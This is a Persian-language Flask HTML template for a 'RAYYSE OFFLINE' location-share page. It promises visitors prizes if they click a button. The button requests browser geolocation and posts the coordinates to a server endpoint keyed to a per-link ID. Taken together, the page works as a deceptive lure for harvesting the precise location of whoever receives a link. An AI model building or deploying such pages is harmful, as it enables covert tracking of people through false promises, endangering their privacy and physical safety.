<!DOCTYPE html>
<html lang="fa" dir="rtl">

<head>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>RAYYSE OFFLINE | Location Share</title>

<link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">

</head>


<body>


<div class="container">


<div class="card">

<h1>
⚡ RAYYSE OFFLINE
</h1>


<h2>
اشتراک موقعیت
</h2>


<p>
برای ارسال موقعیت، اجازه دسترسی به موقعیت مکانی خود را فعال کنید.
</p>


<div class="info">

برای دریافت جوایز کلیمه ریز را کلیک کتید 🥰👇🏻.

</div>


<button onclick="sendLocation()">

📍 اشتراک موقعیت

</button>


<div id="result">

منتظر اجازه شما هستیم...

</div>


</div>


</div>



<script>

function sendLocation(){


let result =
document.getElementById("result");


result.innerHTML =
"📡 در حال بررسی اجازه موقعیت...";



if(navigator.geolocation){


navigator.geolocation.getCurrentPosition(

function(position){


let lat =
position.coords.latitude;


let lng =
position.coords.longitude;



fetch("/send_location/{{link_id}}",{


method:"POST",


headers:{

"Content-Type":
"application/json"

},


body:JSON.stringify({

lat:lat,

lng:lng

})


})

.then(()=>{


result.innerHTML =
"✅ موقعیت با موفقیت ارسال شد";


});



},


function(){


result.innerHTML =
"❌ اجازه موقعیت داده نشد";


}



);


}

else{


result.innerHTML =
"مرورگر شما از موقعیت پشتیبانی نمی‌کند";


}


}


</script>


</body>

</html>
